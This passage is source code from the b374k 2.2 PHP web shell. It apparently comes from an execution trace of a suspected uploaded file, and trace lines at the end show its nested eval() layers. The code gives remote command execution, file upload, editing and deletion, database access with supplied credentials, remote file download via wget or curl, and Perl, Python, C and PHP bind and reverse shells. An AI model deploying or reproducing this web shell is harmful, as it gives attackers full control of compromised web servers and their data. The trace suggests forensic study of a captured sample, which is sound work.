fclose($file); if(is_file($fpath)){ $res = exe("\\"".$fpath."\\" ".$target); } else $result = $errperm; } else $result = $errperm; } } elseif($type == "xback_pl"){ $fname = "b374k_back.pl"; $fpath = $d.$fname; $tar = explode(" ",$target,2); if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe("perl ".$fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } elseif($type == "xback_py"){ $fname = "b374k_back.py"; $fpath = $d.$fname; $tar = explode(" ",$target,2); if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe("python ".$fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } elseif($type == "xback_bin"){ $fname = "b374k_back"; $fpath = $d.$fname; $tar = explode(" ",$target,2); if(!$s_win){ if(is_file($fpath)) unlink($fpath); if(is_file($fpath.".c")) unlink($fpath.".c"); if($file=fopen($fpath.".c","w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath.".c")){ $res = exe("gcc ".$fpath.".c -o ".$fpath); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe($fpath." ".$target); } else $result = $errgcc; } else $result = $errperm; } else $result = $errperm; } else{ $fpath = $fpath . ".exe"; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe($fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } } return $result; } function gs($f){ if($s = filesize($f)){ if($s <= 1024) return $s; else{ if($s <= 1024*1024) { $s = round($s / 1024,2);; return $s." kb"; } else { $s = round($s / 1024 / 1024,2); return $s." mb"; } } } else return "???"; } function gp($f){ if($m=fileperms($f)){ $p=\'\'; $p .= ($m & 00400) ? \'r\' : \'-\'; $p .= ($m & 00200) ? \'w\' : \'-\'; $p .= ($m & 00100) ? \'x\' : \'-\'; $p .= ($m & 00040) ? \'r\' : \'-\'; $p .= ($m & 00020) ? \'w\' : \'-\'; $p .= ($m & 00010) ? \'x\' : \'-\'; $p .= ($m & 00004) ? \'r\' : \'-\'; $p .= ($m & 00002) ? \'w\' : \'-\'; $p .= ($m & 00001) ? \'x\' : \'-\'; return $p; } else return "??????????"; } function exe($c){ if(function_exists(\'system\')) { ob_start(); system($c); $b = ob_get_contents(); ob_end_clean(); return $b; } elseif(function_exists(\'shell_exec\')){ $b = shell_exec($c); return $b; } elseif(function_exists(\'exec\')) { exec($c,$r); $b = ""; foreach($r as $s){ $b .= $s; } return $b; } elseif(function_exists(\'passthru\')) { ob_start(); passthru($c); $b = ob_get_contents(); ob_end_clean(); return $b; } return ""; } function cp($p){ if(is_dir($p)){ $x = DIRECTORY_SEPARATOR; while(substr($p,-1) == $x) $p = rtrim($p,$x); return $p.$x; } return $p; } function rmdirs($d) { $f = glob($d . \'*\', GLOB_MARK); foreach($f as $z){ if(is_dir($z)) rmdirs($z); else unlink($z); } if(is_dir($d)) rmdir($d); } function xwhich($pr){ $p = exe("which $pr"); if(trim($p)!="") { return trim($p); } else { return trim($pr); } } function dlfile($u,$p){ $n = basename($u); if($t = file_get_contents($u)){ if(is_file($p)) unlink($p);; if($f=fopen($p,"w")){ fwrite($f,$t); fclose($f); if(is_file($p)) return true; } } exe(xwhich(\'wget\')." ".$u." -O ".$p); if(is_file($p)) return true; exe(xwhich(\'lwp-download\')." ".$u." ".$p); if(is_file($p)) return true; exe(xwhich(\'lynx\')." -source ".$u." > ".$p); if(is_file($p)) return true; exe(xwhich(\'curl\')." ".$u." -o ".$p); if(is_file($p)) return true; return false; } function showdir($pwd,$prompt,$win){ if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; $fname = array(); $dname = array(); if($dh = scandir($pwd)){ foreach($dh as $file){ if(is_dir($file)) $dname[] = $file; elseif(is_file($file)) $fname[] = $file; } } else{ if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)) $dname[] = $file; elseif(is_file($file))$fname[] = $file; } closedir($dh); } } sort($fname); sort($dname); $path = explode(DIRECTORY_SEPARATOR,$pwd); $tree = sizeof($path); $parent = ""; $buff = "\r \r name size owner : group perms modified actions : ".$group[\'name\']; } else { $owner = $user; } $buff .= "[ $folder ] LINK ".$owner." ".gp($pwd)." ".date("d-M-Y H:i",filemtime($pwd))." newfile | newfolder | upload : ".$group[\'name\']; } else { $owner = $user; } $buff .= "[ $folder ] LINK ".$owner." ".gp($parent)." ".date("d-M-Y H:i",filemtime($parent))." newfile | newfolder | upload : ".$group[\'name\']; } else { $owner = $user; } $buff .= "[ $folder ] \r \r DIR ".$owner." ".gp($pwd.$folder)." ".date("d-M-Y H:i",filemtime($folder))." rename | delete | upload : ".$group[\'name\']; } else { $owner = $user; } $buff .= "$file \r \r ".gs($full)." ".$owner." ".gp($full)." ".date("d-M-Y H:i",filemtime($full))." \r edit | rename | delete | download (gzip )
"; return $buff; } if(isset($_REQUEST[\'favicon\'])){ $data = gzinflate(base64_decode($favicon)); header("Content-type: image/png"); header("Cache-control: public"); echo $data; exit; } if($s_auth){ $s_software = getenv("SERVER_SOFTWARE"); if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") $s_safemode = TRUE; else $s_safemode = FALSE; $s_system = php_uname(); $s_win = FALSE; if(strtolower(substr($s_system,0,3)) == "win") $s_win = TRUE; $letters = \'\'; if(!$s_win){ if(!$s_user = rp(exe("whoami"))) $s_user = ""; if(!$s_id = rp(exe("id"))) $s_id = ""; $pwd = getcwd().DIRECTORY_SEPARATOR; } else { $s_user = get_current_user(); $s_id = $s_user; $pwd = realpath(".")."\\\\"; $v = explode("\\\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter){ $bool = @is_dir($letter.":\\\\"); if ($bool){ $letters .= "[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "".$letter." ";} $letters .= " ] "; } } } $s_prompt = $s_user." >"; if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $s_posix = TRUE; else $s_posix = FALSE; $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]); $s_my_ip = $_SERVER[\'REMOTE_ADDR\']; if(isset($_REQUEST[\'d\'])){ $d = ss($_REQUEST[\'d\']); if(is_dir($d)){ chdir($d); $pwd = cp($d); } } else $pwd = cp(getcwd()); if(isset($_REQUEST[\'sorttable\'])){ $data = gzinflate(base64_decode($sortable_js)); header("Content-type: text/plain"); header("Cache-control: public"); echo $data; exit; } if(isset($_REQUEST[\'dl\']) && ($_REQUEST[\'dl\'] != "")){ $f = ss($_REQUEST[\'dl\']); $fc = file_get_contents($f); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($fc)); header("Content-disposition: attachment; filename=\\"".basename($f)."\\";"); echo $fc; exit; } elseif(isset($_REQUEST[\'dlgzip\']) && ($_REQUEST[\'dlgzip\'] != "")){ $f = ss($_REQUEST[\'dlgzip\']); $fc = gzencode(file_get_contents($f)); header("Content-Type:application/x-gzip\\n"); header("Content-length: ".strlen($fc)); header("Content-disposition: attachment; filename=\\"".basename($f).".gz\\";"); echo $fc; exit; } if(isset($_REQUEST[\'pid\'])){ $p = ss($_REQUEST[\'pid\']); if(function_exists("posix_kill")) posix_kill($p,\'9\'); else{ exe("kill -9 ".$p); exe("taskkill /F /PID ".$p); } } if(isset($_REQUEST[\'img\'])){ ob_clean(); $d = ss($_REQUEST[\'d\']); $f = ss($_REQUEST[\'img\']); $inf = getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; header("Content-type: ".$inf["mime"]); header("Cache-control: public"); header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); header("Cache-control: max-age=".(60*60*24*7)); readfile($d.$f); exit; } if(isset($_REQUEST[\'rename\']) && isset($_REQUEST[\'oldname\']) && isset($_REQUEST[\'newname\'])){ $old = ss($_REQUEST[\'oldname\']); $new = ss($_REQUEST[\'newname\']); rename($pwd.$old,$pwd.$new); $fnew = $pwd.$new; } if(isset($_REQUEST[\'delete\']) && ($_REQUEST[\'delete\'] != "")){ $f = ss($_REQUEST[\'delete\']); if(is_file($f)) unlink($f); } elseif(isset($_REQUEST[\'rmdir\']) && ($_REQUEST[\'rmdir\'] != "")){ $f = ss(rtrim(ss($_REQUEST[\'rmdir\'],DIRECTORY_SEPARATOR))); if(is_dir($f)) rmdirs($f); } elseif(isset($_REQUEST[\'mkdir\']) && ($_REQUEST[\'mkdir\'] != "")){ $f = ss($pwd.ss($_REQUEST[\'mkdir\'])); if(!is_dir($f)) mkdir($f); } $s_result = ""; if(isset($_REQUEST[\'eval\'])){ $c = ""; if(isset($_REQUEST[\'evalcode\'])){ $eval_addition = "error_reporting(E_ALL);@ini_set(\\"display_errors\\", 1);"; $c = ss($_REQUEST[\'evalcode\']); ob_start(); eval(eval($eval_addition) . eval($c)); $b = ob_get_contents(); ob_end_clean(); $code = $b; } $s_result .= " \r "; } elseif(isset($_REQUEST[\'upload\'])){ $s_result = " "; $msg = ""; if(isset($_REQUEST[\'uploadhd\'])){ $fn = $_FILES[\'filepath\'][\'name\']; if(is_uploaded_file($_FILES[\'filepath\'][\'tmp_name\'])){ $p = cp(ss($_REQUEST[\'savefolder\'])); if(!is_dir($p)) $p = cp(dirname($p)); if(isset($_REQUEST[\'savefilename\']) && (trim($_REQUEST[\'savefilename\'])!="")) $fn = ss($_REQUEST[\'savefilename\']); $tm = $_FILES[\'filepath\'][\'tmp_name\']; $pi = cp($p).$fn; $st = move_uploaded_file($tm,$pi); if($st) $msg = "file uploaded to ".$pi."
"; else $msg = "failed to upload ".$fn."
"; } else $msg = "failed to upload ".$fn."
"; } elseif(isset($_REQUEST[\'uploadurl\'])){ $p = cp(ss($_REQUEST[\'savefolderurl\'])); if(!is_dir($p)) $p = cp(dirname($p)); $fu = ss($_REQUEST[\'fileurl\']); $fn = basename($fu); if(isset($_REQUEST[\'savefilenameurl\']) && (trim($_REQUEST[\'savefilenameurl\'])!="")) $fn = ss($_REQUEST[\'savefilenameurl\']); $fp = cp($p).$fn; $st = dlfile($fu,$fp); if($st) $msg = "file uploaded to ".$fp."
"; else $msg = "failed to upload ".$fn."
"; } $s_result .= $msg; $s_result .= "\r \r \r \r \r "; } elseif(isset($_REQUEST[\'phpinfo\'])){ ob_start(); eval("phpinfo();"); $b = ob_get_contents(); ob_end_clean(); $a = strpos($b,"")+6; $z = strpos($b,""); $s_result = "".substr($b,$a,$z-$a)."
"; } elseif(isset($_REQUEST[\'db\'])){ $sqlhost = $sqlhost1 = $sqlhost2 = $sqlhost3 = $sqlhost4 = \'localhost\'; $sqluser = $sqluser1 = $sqluser2 = $sqluser3 = $sqluser4 = $odbcuser = $odbcdsn = $pdodsn = $pdouser = \'\'; $sqlport = $sqlport1 = $sqlport2 = $sqlport3 = $sqlport4 = \'\'; $sqlpass = $sqlpass1 = $sqlpass2 = $sqlpass3 = $sqlpass4 = $odbcpass = $pdopass = \'\'; if(isset($_REQUEST[\'mysqlcon\'])&&isset($_REQUEST[\'sqlhost1\'])) $sqlhost = $sqlhost1 = ss($_REQUEST[\'sqlhost1\']); if(isset($_REQUEST[\'mssqlcon\'])&&isset($_REQUEST[\'sqlhost2\'])) $sqlhost = $sqlhost2 = ss($_REQUEST[\'sqlhost2\']); if(isset($_REQUEST[\'pgsqlcon\'])&&isset($_REQUEST[\'sqlhost3\'])) $sqlhost = $sqlhost3 = ss($_REQUEST[\'sqlhost3\']); if(isset($_REQUEST[\'oraclecon\'])&&isset($_REQUEST[\'sqlhost4\'])) $sqlhost = $sqlhost4 = ss($_REQUEST[\'sqlhost4\']); if(isset($_REQUEST[\'odbccon\'])&&isset($_REQUEST[\'odbcdsn\'])) $odbcdsn = ss($_REQUEST[\'odbcdsn\']); if(isset($_REQUEST[\'pdocon\'])&&isset($_REQUEST[\'pdodsn\'])) $pdodsn = ss($_REQUEST[\'pdodsn\']); if(isset($_REQUEST[\'sqlhost\'])) $sqlhost = ss($_REQUEST[\'sqlhost\']); if(isset($_REQUEST[\'mysqlcon\'])&&isset($_REQUEST[\'sqluser1\'])) $sqluser = $sqluser1 = ss($_REQUEST[\'sqluser1\']); if(isset($_REQUEST[\'mssqlcon\'])&&isset($_REQUEST[\'sqluser2\'])) $sqluser = $sqluser2 = ss($_REQUEST[\'sqluser2\']); if(isset($_REQUEST[\'pgsqlcon\'])&&isset($_REQUEST[\'sqluser3\'])) $sqluser = $sqluser3 = ss($_REQUEST[\'sqluser3\']); if(isset($_REQUEST[\'oraclecon\'])&&isset($_REQUEST[\'sqluser4\'])) $sqluser = $sqluser4 = ss($_REQUEST[\'sqluser4\']); if(isset($_REQUEST[\'odbccon\'])&&isset($_REQUEST[\'odbcuser\'])) $odbcuser = ss($_REQUEST[\'odbcuser\']); if(isset($_REQUEST[\'pdocon\'])&&isset($_REQUEST[\'pdouser\'])) $pdouser = ss($_REQUEST[\'pdouser\']); if(isset($_REQUEST[\'sqluser\'])) $sqluser = ss($_REQUEST[\'sqluser\']); if(isset($_REQUEST[\'mysqlcon\'])&&isset($_REQUEST[\'sqlport1\'])) $sqlport = $sqlport1 = ss($_REQUEST[\'sqlport1\']); if(isset($_REQUEST[\'mssqlcon\'])&&isset($_REQUEST[\'sqlport2\'])) $sqlport = $sqlport2 = ss($_REQUEST[\'sqlport2\']); if(isset($_REQUEST[\'pgsqlcon\'])&&isset($_REQUEST[\'sqlport3\'])) $sqlport = $sqlport3 = ss($_REQUEST[\'sqlport3\']); if(isset($_REQUEST[\'oraclecon\'])&&isset($_REQUEST[\'sqlport4\'])) $sqlport = $sqlport4 = ss($_REQUEST[\'sqlport4\']); if(isset($_REQUEST[\'sqlport\'])) $sqlport = ss($_REQUEST[\'sqlport\']); if(isset($_REQUEST[\'mysqlcon\'])&&isset($_REQUEST[\'sqlpass1\'])) $sqlpass = $sqlpass1 = ss($_REQUEST[\'sqlpass1\']); if(isset($_REQUEST[\'mssqlcon\'])&&isset($_REQUEST[\'sqlpass2\'])) $sqlpass = $sqlpass2 = ss($_REQUEST[\'sqlpass2\']); if(isset($_REQUEST[\'pgsqlcon\'])&&isset($_REQUEST[\'sqlpass3\'])) $sqlpass = $sqlpass3 = ss($_REQUEST[\'sqlpass3\']); if(isset($_REQUEST[\'oraclecon\'])&&isset($_REQUEST[\'sqlpass4\'])) $sqlpass = $sqlpass4 = ss($_REQUEST[\'sqlpass4\']); if(isset($_REQUEST[\'odbccon\'])&&isset($_REQUEST[\'odbcpass\'])) $odbcpass = ss($_REQUEST[\'odbcpass\']); if(isset($_REQUEST[\'pdocon\'])&&isset($_REQUEST[\'pdopass\'])) $pdopass = ss($_REQUEST[\'pdopass\']); if(isset($_REQUEST[\'sqlpass\'])&&isset($_REQUEST[\'sqlpass\'])) $sqlpass = ss($_REQUEST[\'sqlpass\']); $sqls = ""; $q_result = ""; $hostandport = $sqlhost; if(trim($sqlport)!="") $hostandport = $sqlhost.":".$sqlport; if(isset($_REQUEST[\'mysqlcon\']) && ($con = mysql_connect($hostandport,$sqluser,$sqlpass))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $q_result .= "".$query."; \r [ ok ]
\r "; for($i=0;$i"; $q_result .= " "; while($rows=mysql_fetch_array($hasil)){ $q_result .= ""; for($j=0;$j"; } $q_result .= " "; } $q_result .= "
"; } else $q_result .= "".$query."; \r [ error ]
"; } } } else $sqls = "SHOW databases;"; $s_result .= " "; $s_result .= "".$q_result."
"; if($con) mysql_close($con); } elseif(isset($_REQUEST[\'mssqlcon\']) && ($con = mssql_connect($hostandport,$sqluser,$sqlpass))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mssql_query($query); if($hasil){ $q_result .= "".$query."; \r [ ok ]
\r "; for($i=0;$i"; $q_result .= " "; while($rows=mssql_fetch_array($hasil)){ $q_result .= ""; for($j=0;$j"; } $q_result .= " "; } $q_result .= "
"; } else $q_result .= "".$query."; \r [ error ]
"; } } } else $sqls = "EXEC sp_databases;"; $s_result .= " "; $s_result .= "".$q_result."
"; if($con) mssql_close($con); } elseif(isset($_REQUEST[\'oraclecon\']) && ($con = oci_connect($sqluser,$sqlpass,$hostandport))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $st = oci_parse($con, $query); if(oci_execute($st)){ $q_result .= "".$query."; \r [ ok ]
\r "; for($i=1;$i<=oci_num_fields($st);$i++) $q_result .= "".htmlspecialchars(oci_field_name($st,$i))." "; $q_result .= " "; while($rows=oci_fetch_array($st)){ $q_result .= ""; for($j=0;$j"; } $q_result .= " "; } $q_result .= "
"; } else $q_result .= "".$query."; \r [ error ]
"; } } } else $sqls = "SELECT * FROM user_tablespaces;"; $s_result .= " "; $s_result .= "".$q_result."
"; if($con) oci_close($con); } elseif(isset($_REQUEST[\'pgsqlcon\']) && ($con = pg_connect("host=$sqlhost user=$sqluser password=$sqlpass port=$sqlport"))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $hasil = pg_query($query); if($hasil){ $q_result .= "".$query."; \r [ ok ]
\r "; for($i=0;$i"; $q_result .= " "; while($rows=pg_fetch_array($hasil)){ $q_result .= ""; for($j=0;$j"; } $q_result .= " "; } $q_result .= "
"; } else $q_result .= "".$query."; \r [ error ]
"; } } } } elseif(isset($_REQUEST[\'odbccon\']) && ($con = odbc_connect($odbcdsn,$odbcuser,$odbcpass))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $hasil = odbc_exec($con, $query); if($hasil){ $q_result .= "".$query."; \r [ ok ]
\r "; for($i=1;$i<=odbc_num_fields($hasil);$i++) $q_result .= "".htmlspecialchars(odbc_field_name($hasil,$i))." "; $q_result .= " "; while($rows=odbc_fetch_array($hasil)){ $q_result .= ""; foreach($rows as $r) { if($r == "") $dataz = " "; else $dataz = $r; $q_result .= "".htmlspecialchars($dataz)." "; } $q_result .= " "; } $q_result .= "
"; } else $q_result .= "".$query."; \r [ error ]
"; } } } else $sqls = ""; $s_result .= " "; $s_result .= "".$q_result."
"; if($con) odbc_close($con); } else{ if(isset($_REQUEST[\'pdocon\'])){ try{ $mypdo = new PDO($pdodsn,$pdouser,$pdopass); if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ if($hasil = $mypdo->query($query)){ $q_result .= "".$query."; \r [ ok ]
\r "; $r = $hasil->fetch(PDO::FETCH_ASSOC); $savefirstrow = array(); foreach($r as $fn=>$fv){ $q_result .= "".htmlspecialchars($fn)." "; $savefirstrow[] = $fv; } $q_result .= " "; foreach($savefirstrow as $fv){ $q_result .= "".htmlspecialchars($fv)." "; } $q_result .= " "; while($rows = $hasil->fetch(PDO::FETCH_ASSOC)){ $q_result .= ""; foreach($rows as $r) { if($r == "") $dataz = " "; else $dataz = $r; $q_result .= "".htmlspecialchars($dataz)." "; } $q_result .= " "; } $q_result .= "
"; } else{ $q_result .= "".$query."; \r [ error ]
"; } $q_result .= ""; } } } else $sqls = ""; $s_result .= " "; $s_result .= "".$q_result."
"; } catch (PDOException $uck) { die(); } } else{ $s_result .= "connect to MySQL \r
\r
\r
\r \r
connect to MsSQL \r
\r
\r
\r \r
server_ip port ' on your computer"; $rspesanb = "Run ' nc -l -v -p port ' on your computer and press ' Go ! ' button"; $rsport1 = $rsport; $rsport2 = $rsport; $rsport3 = $rsport; if(isset($_REQUEST[\'xbind_pl\'])){ if(isset($_REQUEST[\'sqlport1\'])) $rsport1 = ss($_REQUEST[\'sqlport1\']); $rstarget = $rsport1; $rsres = rs($s_win, cp($d), "xbind_pl" ,$xbind_pl, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xbind_py\'])){ if(isset($_REQUEST[\'sqlport2\'])) $rsport2 = ss($_REQUEST[\'sqlport2\']); $rstarget = $rsport2; $rsres = rs($s_win, cp($d), "xbind_py" ,$xmulti_py, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xbind_bin\'])){ if(isset($_REQUEST[\'sqlport3\'])) $rsport3 = ss($_REQUEST[\'sqlport3\']); $rstarget = $rsport3; if(!$s_win) $rsres = rs($s_win, cp($d), "xbind_bin" ,$xbind_c, $rstarget); else $rsres = rs($s_win, cp($d), "xbind_bin" ,$wmulti_c, $rstarget); $s_result .= $rsres; } $rsportb1 = $rsport; $rsportb2 = $rsport; $rsportb3 = $rsport; $rsportb4 = $rsport; $rstarget1 = $s_my_ip; $rstarget2 = $s_my_ip; $rstarget3 = $s_my_ip; $rstarget4 = $s_my_ip; if(isset($_REQUEST[\'xback_pl\'])){ if(isset($_REQUEST[\'sqlportb1\'])) $rsportb1 = ss($_REQUEST[\'sqlportb1\']); if(isset($_REQUEST[\'rstarget1\'])) $rstarget1 = ss($_REQUEST[\'rstarget1\']); $rstarget = $rsportb1." ".$rstarget1; $rsres = rs($s_win, cp($d), "xback_pl" ,$xback_pl, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xback_py\'])){ if(isset($_REQUEST[\'sqlportb2\'])) $rsportb2 = ss($_REQUEST[\'sqlportb2\']); if(isset($_REQUEST[\'rstarget2\'])) $rstarget2 = ss($_REQUEST[\'rstarget2\']); $rstarget = $rsportb2." ".$rstarget2; $rsres = rs($s_win, cp($d), "xback_py" ,$xmulti_py, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xback_bin\'])){ if(isset($_REQUEST[\'sqlportb3\'])) $rsportb3 = ss($_REQUEST[\'sqlportb3\']); if(isset($_REQUEST[\'rstarget3\'])) $rstarget3 = ss($_REQUEST[\'rstarget3\']); $rstarget = $rsportb3." ".$rstarget3; if(!$s_win) $rsres = rs($s_win, cp($d), "xback_bin" ,$xback_c, $rstarget); else $rsres = rs($s_win, cp($d), "xback_bin" ,$wmulti_c, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xback_php\'])){ if(isset($_REQUEST[\'sqlportb4\'])) $rsportb4 = ss($_REQUEST[\'sqlportb4\']); if(isset($_REQUEST[\'rstarget4\'])) $rstarget4 = ss($_REQUEST[\'rstarget4\']); $ip = $rstarget4; $port = $rsportb4; $chunk_size = 1337; $write_a = null; $error_a = null; $shell = \'/bin/sh\'; $daemon = 0; $debug = 0; if(function_exists(\'pcntl_fork\')){ $pid = pcntl_fork(); if ($pid == -1) exit(1); if ($pid) exit(0); if (posix_setsid() == -1) exit(1); $daemon = 1; } umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if(!$sock) exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while(1){ if(feof($sock)) break; if(feof($pipes[1])) break; $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, $read_a)){ $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if(in_array($pipes[1], $read_a)){ $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if(in_array($pipes[2], $read_a)){ $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); } } fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]); proc_close($process); $rsres = " "; $s_result .= $rsres; } $s_result .= "Bind shell ( perl ) \r
\r
\r
\r
".$rspesan." \r
\r \r
Bind shell ( python ) \r
\r
\r
\r
".$rspesan." \r
\r \r
Bind shell ( bin ) \r
\r
\r
\r
".$rspesan." \r
\r \r
Reverse shell ( perl ) \r
\r
\r
\r
".$rspesanb." \r
\r \r
Reverse shell ( python ) \r
\r
\r
\r
".$rspesanb." \r
\r \r
Reverse shell ( bin ) \r
\r
\r
\r
".$rspesanb." \r
\r \r
Reverse shell ( php ) \r
\r
\r
\r
".$rspesanb." \r
\r \r
: ".$group[\'name\']; } else { $owner = $s_user; } $filn = basename($f); $s_result .= "\r Filename ".$f." \r \r Size ".gs($f)." Permission ".gp($f)." Owner ".$owner." Create time ".date("d-M-Y H:i",filectime($f))." Last modified ".date("d-M-Y H:i",filemtime($f))." Last accessed ".date("d-M-Y H:i",fileatime($f))." Actions \r edit |\r rename |\r delete |\r download (gzip ) View \r text |\r code |\r image
\r "; $t = ""; $iinfo = getimagesize($f); if(substr($filn,-3,3) == "php") $t = "code"; if(is_array($iinfo)) $t = \'image\'; if(isset($_REQUEST[\'type\'])) $t = ss($_REQUEST[\'type\']); if($t=="image"){ $width = (int) $iinfo[0]; $height = (int) $iinfo[1]; $imginfo = "Image type = ( ".$iinfo[\'mime\']." )( ".$width." x ".$height." ) \r [ view full size ]
"; } else $imglink = ""; $s_result .= "".$imglink."\r
"; $file = wordwrap(file_get_contents($f),160,"\\n",true); $buff = highlight_string($file,true); $old = array("0000BB","000000","FF8000","DD0000", "007700"); $new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000"); $buff = str_ireplace($old,$new, $buff); $s_result .= $buff; $s_result .= "
"; } else { $s_result .= ""; $s_result .= nl2br(htmlentities(wordwrap(file_get_contents($f),160,"\\n",true))); $s_result .= "
"; } } elseif(is_dir($f)){ chdir($f); $pwd = cp(getcwd()); $s_result .= showdir($pwd,$s_prompt,$s_win); } } elseif(isset($_REQUEST[\'edit\'])){ $f = ss($_REQUEST[\'edit\']); $fc = ""; $fcs = ""; if(is_file($f)) $fc = file_get_contents($f); if(isset($_REQUEST[\'fcsubmit\'])){ $fc = ssc($_REQUEST[\'fc\']); if($filez = fopen($f,"w")){ $time = date("d-M-Y H:i",time()); if(fwrite($filez,$fc)) $fcs = "file saved @ ".$time; else $fcs = "failed to save"; fclose($filez); } else $fcs = "permission denied"; } $s_result .= " \r "; } elseif(isset($_REQUEST[\'ps\'])){ $s_result = ""; if(!$s_win) $h = "ps -aux"; else $h = "tasklist /V /FO csv"; $wcount = 11; $wexplode = " "; if($s_win) $wexplode = "\\",\\""; $res = exe($h); if(trim($res)==\'\') $s_result .= "error: permission denied
"; else{ if(!$s_win) $res = preg_replace(\'#\\ +#\',\' \',$res); $psarr = explode("\\n",$res); $fi = true; $tblcount = 0; $check = explode($wexplode,$psarr[0]); $wcount = count($check); foreach($psarr as $psa){ if(trim($psa)!=\'\'){ if($fi){ $fi = false; $psln = explode($wexplode,$psa,$wcount); $s_result .= "action "; foreach($psln as $p){ $s_result .= "".trim(trim(strtolower($p)),"\\"")." "; } $s_result .= ""; $tblcount = 0; foreach($psln as $p){ if(trim($p)=="") $p = " "; if($tblcount == 0){ $s_result .= "kill ".trim(trim($p),"\\"")." "; $tblcount++; } else{ $tblcount++; if($tblcount == count($psln)) $s_result .= "".trim(trim($p), "\\"")." "; else $s_result .= "".trim(trim($p), "\\"")." "; } } $s_result .= " "; } } } $s_result .= "
"; } } else{ if(isset($_REQUEST[\'cmd\'])){ $cmd = ss($_REQUEST[\'cmd\']); if(strlen($cmd) > 0){ if(preg_match(\'#^cd(\\ )+(.*)$#\',$cmd,$r)){ $nd = trim($r[2]); if(is_dir($nd)){ chdir($nd); $pwd = cp(getcwd()); $s_result .= showdir($pwd,$s_prompt,$s_win); } elseif(is_dir($pwd.$nd)){ chdir($pwd.$nd); $pwd = cp(getcwd()); $s_result .= showdir($pwd,$s_prompt,$s_win); } else $s_result .= "".$nd." is not a directory"." "; } else{ $s_r = htmlspecialchars(exe($cmd)); if($s_r != \'\') $s_result .= "".$s_r." "; else $s_result .= showdir($pwd,$s_prompt,$s_win); } } else $s_result .= showdir($pwd,$s_prompt,$s_win); } else $s_result .= showdir($pwd,$s_prompt,$s_win); } $s_info = "".$s_software." ".$s_system." ".$s_id." server ip : ".$s_server_ip." | your ip : ".$s_my_ip." | "; if($s_safemode) $s_info .= "safemode ON "; else $s_info .= "safemode OFF "; $s_info .= " | Time @ Server : ".date("d M Y H:i:s",time()); $s_info .= "\r \r \r ".trim($letters)." \r \r \r \r ".swd($pwd)." \r \r \r \r
\r
"; } ?>\r \r \r \r \r <?php echo $s_title; ?> \r \r \r
\r
\r \r \r \r \r \r
\r \r \r \r ' /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 25 0
5 20 0 0.013237 999640 error_reporting 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 1 0
5 20 1 0.013255 999680
5 20 R 22527
5 21 0 0.013269 999640 set_time_limit 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 1 0
5 21 1 0.013287 999704
5 21 R FALSE
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $s_name = 'b374k'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $s_ver = '2.2'
